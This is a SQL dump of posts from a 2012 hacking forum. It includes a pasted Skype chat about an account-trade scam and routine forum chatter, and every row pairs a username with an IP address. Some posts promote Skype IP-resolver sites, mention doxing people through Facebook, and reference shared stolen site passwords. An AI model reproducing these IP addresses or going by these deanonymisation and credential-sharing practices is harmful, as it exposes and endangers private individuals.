| Jacob: Yeah [10/14/2012 4:33:01 PM] Ryan | Jacob: Anyways [10/14/2012 4:33:04 PM] Ryan | Jacob: I\'m hacking [10/14/2012 4:33:11 PM] Zane Anderson: lol? [10/14/2012 4:33:16 PM] Ryan | Jacob: :D [10/14/2012 4:33:24 PM] Ryan | Jacob: Gonna be level 45 in a few days or so. [10/14/2012 4:33:34 PM] Ryan | Jacob: If I bot 24/7 [10/14/2012 4:33:37 PM] Ryan | Jacob: And overnight [10/14/2012 4:33:42 PM] Ryan | Jacob: With my Boost items [10/14/2012 4:33:47 PM] Zane Anderson: lol [10/14/2012 4:37:09 PM] Ryan | Jacob: What does Toki The Archangel stand for? [10/14/2012 4:37:11 PM] Ryan | Jacob: Just asking [10/14/2012 4:37:33 PM] Zane Anderson: idk Toki is from metalocylpse [10/14/2012 4:38:24 PM] Ryan | Jacob: What\'s that mean? :P [10/14/2012 4:38:32 PM] Zane Anderson: its a show [10/14/2012 4:40:42 PM] Ryan | Jacob: Oh [10/14/2012 4:40:48 PM] Zane Anderson: yea lol [10/14/2012 4:40:54 PM] Ryan | Jacob: Botting now :3 [10/14/2012 4:41:01 PM] Zane Anderson: lol [10/14/2012 4:41:41 PM] *** Call to Zane Anderson *** [10/14/2012 4:42:09 PM] Ryan | Jacob: See? :P [10/14/2012 4:42:59 PM] Ryan | Jacob: Fun :3 [10/14/2012 4:43:03 PM] Ryan | Jacob: xD [10/14/2012 4:48:49 PM] *** Call ended, duration 07:08 *** [10/14/2012 4:51:31 PM] Ryan | Jacob: Back [10/14/2012 4:51:36 PM] Ryan | Jacob: Had to carry in groceries [10/14/2012 4:51:40 PM] Zane Anderson: lol [10/14/2012 4:51:48 PM] *** Call to Zane Anderson, duration 09:08. *** [10/14/2012 9:11:32 PM] Ryan | Jacob: Hey [10/14/2012 9:11:39 PM] Ryan | Jacob: Did you change the password to the AQW Account? [10/14/2012 9:11:47 PM] Ryan | Jacob: Because I can\'t seem to login it anymore... [10/14/2012 9:37:15 PM] Ryan | Jacob: You changed your password.. [10/14/2012 9:37:20 PM] Ryan | Jacob: It wouldn\'t allow me to login [10/14/2012 9:37:36 PM] Ryan | Jacob: And also I tried recovering it and it said that my email was not registered [10/14/2012 9:38:08 PM] Ryan | Jacob: and then I tried recovering the password using Removed for safety reasons and it sent it to your email.. You clicked on the dispution link. [10/14/2012 9:38:14 PM] Ryan | Jacob: Why would you scam me :/ [10/15/2012 3:22:00 PM] Ryan | Jacob: Why did you scam me? :/ [10/15/2012 3:22:09 PM] Ryan | Jacob: You changed the password.. [10/15/2012 3:22:16 PM] Ryan | Jacob: And I gave you my personal MC Account. [10/15/2012 3:22:21 PM] Ryan | Jacob: :/ [10/15/2012 3:22:24 PM] Ryan | Jacob: Afk. [10/15/2012 9:35:53 PM] Ryan | Jacob: Hey [10/15/2012 11:14:47 PM] Ryan | Jacob: Zane.. [10/15/2012 11:14:56 PM] Ryan | Jacob: The actions you did were wrong. [10/15/2012 11:15:03 PM] Ryan | Jacob: Shouldn\'t have done that.. [9:32:01 AM] Zane Anderson: Hey Read my pm on leet hacking [3:24:19 PM] Ryan | Jacob: I\'m not even going to bother.. Me on AQ account 3 hours before the password was changed [img]http://i.imgur.com/kyWbG.png[/img] His Character Page now: http://www.aq.com/aw-character.asp?id=Toki%20The%20ArchAngel I never equipped any of those items he is currently equipping & I never had some of those items before. Someone had to go on the account and get it. Greed you went first. But you never changed the email to mine on the AQW account. You didn\'t give me full information. I did. I went first I changed the MC Password, Email, and other stuff first. And gave it to you. So I went first. Not you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59c7316a37fa908af817335b084b6741', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4914', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '61', 'NXK', '1350416696', '-Childish Gambino <- favorite http://www.youtube.com/watch?v=TCRTaw9SY8E -A$AP Rocky http://www.youtube.com/watch?v=ofoIMg76Sng -Jurrasic 5 http://www.youtube.com/watch?v=KeN9c2GYJkk -Anyone in good music is really good (kayne,Pusha T,Common,2Chainz, etc) http://www.youtube.com/watch?v=GJcQ5j3q0S0', '99.253.94.204', '1677549260', '1', '0', '61', '1350416949', '1', 'c2aedd348b782815658a345d719b3cfe', '0', '1350416949'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4915', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '214', 'Rave™', '1350417640', 'I will join! I would love to win this!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '26e0d42326943bc86b32765a5cdce594', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4916', '886', '4820', '35', 'RE: My logo', '0', '257', 'XxTREYZxX', '1350418044', 'ok thanks for the comments guys i will be closing this thread and making a new thread when i get my new avatar thanks for all your comments!', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '5427cb2f66005bda7d5031e7a4200f60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4917', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '257', 'XxTREYZxX', '1350418387', 'hello and welcome,remember stay HQ and active:)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '83d7e12a372f96e72e24c9d955e05833', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4918', '869', '4712', '74', 'RE: who loves counter strike', '0', '257', 'XxTREYZxX', '1350418780', 'you should try getting in to gaming you will love its great fun, and competive when you wanna. and i thinks every one likes it exept a few', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'ce942017f8313deb6e47cb17349451a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4919', '899', '0', '7', '[Demo] New L33THacking Skype Resolver', '0', '61', 'NXK', '1350419409', 'http://nxkallday.comoj.com/ [It may work it has a old api I used to use] My API isn\'t in it yet. Thoughts? I have a Lifetime API I\'m willing to trade or sell Let me know.', '99.253.94.204', '1677549260', '1', '0', '61', '1350419536', '1', '1ef07ca892afb141ac6d1b3ab774cf37', '0', '1350419536'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4920', '822', '4915', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350420329', '[quote=\'Rave™\' pid=\'4915\' dateline=\'1350417640\'] I will join! I would love to win this! [/quote] Nice The People Above this comment has 100% chance to win the giveaway', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6053ec860227084218e5e19861ea2f0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4921', '861', '4620', '7', 'RE: L33T Hacking Milestones', '0', '228', 'VirtualLegend', '1350420511', '[quote=\'iTzIpod\' pid=\'4620\' dateline=\'1350225150\'] Me, t3h jok3r, Apathy, Pontaholic (I don\'t know your name sorry :/ ) , Flamingworm, NXK, forgot who else.. [/quote] Lol you forgot me :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2bba18fee38277ece6f85b81020e3648', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4922', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '228', 'VirtualLegend', '1350420858', 'I don\'t have a Xbox but Nice Share :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '34f669a4c788308ca64b27aa807d0db3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4923', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350421789', 'This has been dealt with, Due to greed not being able to show Any proof he Didn\'t do it. We do not allow scamming, No matter what.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8feaafecb057893fea84d8352644f62b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4924', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '228', 'VirtualLegend', '1350421792', 'Favorite Rapper: Drake & Lil Wayne', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4b5017273cf4f8b6fe4adedc06d2f7c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4925', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '61', 'NXK', '1350421871', '[hl=Yellow]This is pretty awesome![/hl]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd75775f9f4ac44f5edb4568000a2d72a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4926', '898', '4908', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '228', 'VirtualLegend', '1350421887', '[quote=\'R?????zo?\' pid=\'4908\' dateline=\'1350408257\'] Alreay knew this, thanks for sharing though :) [/quote] Do you know more handy site\'s ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9c4715de0fb9a056e667fc5b035715ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4927', '190', '665', '56', 'RE: Copy and paste game', '0', '228', 'VirtualLegend', '1350424262', 'NEFantasy\'s PPD E-book (I don\'t know where i got this)', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9ef70d961769f6896c81cf8ac4f21f91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4928', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '1', 't3h jok3r', '1350424473', 'Yup and you can put any background color', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '66ae677078d2201e871be8cc09e0bfa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4929', '900', '0', '63', 'Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1350424596', '[align=center][color=#98FB98][size=medium]Hello LH Members, If you don\'t have a signature or want a new one than this is your chance. I will make one for you, if you don\'t like how i made it. I will remake it with your Specific details. The Reason Why I\'m doing this is that i want to get better with GFX and too do something good for the LH Members. Leave a Post behind if your intrested. And As Always Have a Good Day :P [/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '289757fb275acbc7a07df22a0e7a8f49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4930', '901', '0', '19', '[Junk]L33THacking Skype Resolver!', '0', '214', 'Rave™', '1350424793', '[b]Enjoy <3333 If it says 127.0.0.1 that is because your trying to resolve a Whitelist username. AKA Me, or my friend joker is not whitelisted ;)[/b] http://raveresolver.tk/', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '3a848524bfab65c5a807a5d604568a3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4931', '888', '4832', '7', 'RE: Greed is a scammer', '0', '1', 't3h jok3r', '1350424811', 'I increased the ban duration to 6 months and IP banned him. If I can get a screenhot on the scammer then I can add his OP into the scammers database with is used world wide but many people, companies and officials', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ccd320a3f79e461534993accfc612f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4932', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '3', '??????????¢™', '1350426576', 'I think everyone understands now.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6ede60ea4b0890f1f8cad416420316ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4933', '889', '4842', '3', 'RE: Vote for a new theme', '0', '3', '??????????¢™', '1350426683', 'It was difficult out of theme 1 and 3 but number 2 I had on my forum before but didnt like it so I changed it. I picked theme 1 only because theme 3 looks kinda like 2 and it might look ugly like 2.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f1c6931c0b88020eaec515afe4aa0f1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4934', '888', '4832', '7', 'RE: Greed is a scammer', '0', '3', '??????????¢™', '1350427159', 'Well bye bye Greed, We hate scammers.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'dfb43b3f6b29ba80f0adbd46eb347b20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4935', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350427347', 'I have sent the source to GronGamers.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3d79278e2d208e0df6cb7600d4562663', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4936', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '3', '??????????¢™', '1350427486', 'I have sent the code to Reloadzer @??zg???g????61, No problem.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e00f6ae9939de6fb111aea9d38968a09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4937', '902', '0', '52', 'Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350427511', '[color=#32CD32][align=center]Hi, Like as the title says. I have made a Xbox live code generator and i want to do a tutorial who is intrested? Video of My VB generator: [video=youtube]http://www.youtube.com/watch?v=6v3OgIJ3Jw8&feature=results_video[/video] And Of course it\'s fake (Don\'t download it)[/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5188535ccc44696383578374ed4182fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4938', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '214', 'Rave™', '1350427592', 'Wow you are LQ. Even after joker told you NO POST AND PM You did post and PM. Very LQ and I hope you lose your mod.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '8ea1548025eea6bf59a3f5605016cf6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4939', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '62', 'R?????zo?', '1350428242', 'Does not work for me, thanks anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2f9576e455d28a238006997eb2754c97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4940', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350428356', '\"IP Resolved: User does not exist or has been offline for a while\" I get this all the time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1656e17b0a21315f3c125e9e596b363a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4941', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350428386', 'IP Resolved: User does not exist or has been offline for a while', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f9ca71619b10bf5394d6c379f4861f88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4942', '896', '4892', '23', 'RE: How to secure your Router', '0', '228', 'VirtualLegend', '1350428994', 'Nice Tutorial And a good way to start a Tutorial with a funny picture Keep the work up !', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0165ed6c7b87cb155405b26b178de3b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4943', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '1', 't3h jok3r', '1350429014', 'Welcome to L33THacking, where did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6e1443edc996d2d814abb1de434b411', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4944', '873', '4752', '7', 'RE: What do you think of Facebook?', '0', '1', 't3h jok3r', '1350430150', '[quote=\'mothered\' pid=\'4752\' dateline=\'1350298529\'] I agree with the above, to have a laugh and post fake details. \"FB is a useless site but good for advertising\". Well said Timmy :) [/quote] Well said Mothered. I only use FB for advertising and for creating DOXes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26db5edb9d6f2bd987c3fbc2296107da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4945', '874', '4744', '7', 'RE: N.A.S.A HACKED', '0', '1', 't3h jok3r', '1350430186', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'4744\' dateline=\'1350276589\'] i think they need to upgrade their security settings. [/quote] I agree but then the security is there but for how long? Lol I read that quote somewhere.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '335d384267573328905db9b30695e9fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4946', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '3', '??????????¢™', '1350430302', 'One day NASA is going to get hacked and never be able to bring the site back.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3c85dd078e66a2987902d9e7152b0082', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4947', '899', '4940', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '1', 't3h jok3r', '1350430312', '[quote=\'R?????zo?\' pid=\'4940\' dateline=\'1350428356\'] \"IP Resolved: User does not exist or has been offline for a while\" I get this all the time. [/quote] I even logged on and tried but got the same error, possibly because the API key is done however this is the demo thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a83a758cb3837805ff64023327bc690d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4948', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350430431', 'Umm doesn\'t work. Oh wait nice trolling :D JK, btw is this the same Resolver NXK is making?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd8b48c6a32f6c8911391b3352ceb19d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4949', '821', '4733', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '1', 't3h jok3r', '1350431596', '[quote=\'Timmy\' pid=\'4733\' dateline=\'1350274047\'] [quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\'] Lol Greed. OT: I\'m thinking if I should drink water now or after I\'m done checking my emails. [/quote] This right here is the best answer on this thread. [/quote] Lol I was confused that day. I was soo confused that I sent my Geo teacher my English Homework through email lol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5ce78bc63afec579075217e91cd68fde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4950', '874', '4946', '7', 'RE: N.A.S.A HACKED', '0', '5', 'Timmy', '1350432568', '[quote=\'??????????¢™\' pid=\'4946\' dateline=\'1350430302\'] One day NASA is going to get hacked and never be able to bring the site back. [/quote] I think they have backups but i don\'t get how such a big government site keep on getting hacked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9928f1ab00a11688f64cf162b2655253', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4951', '839', '4389', '54', 'RE: Brazzers,Bangbros,RK,and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '5', 'Timmy', '1350432662', 'Thanks for the list. I scanned it and it\'s clean.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4cf745baeb3bf24d2d3927879196c49b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4952', '903', '0', '50', 'Report against a thread', '0', '5', 'Timmy', '1350432711', 'http://l33thacking.net/thread-839-post-4951.html#pid4951 That threads title is too big and people can\'t post because of that.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '755424dff005536c1fe7c58cd53dc9b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4953', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '5', 'Timmy', '1350432864', 'Yeah me too I think this should be closed now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed296e33f825f49915d936de37dbde71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4954', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '259', 'MeowMeow', '1350432908', 'You guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing.', '65.49.2.14', '1093730830', '0', '0', '0', '0', '1', '33c64c83b3cb58c93a6e5cdef16fce0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4955', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '5', 'Timmy', '1350432963', 'Whatever sounds good is my choice in rap.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd2565abe56e02cda86b3ae3e8b887ac5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, 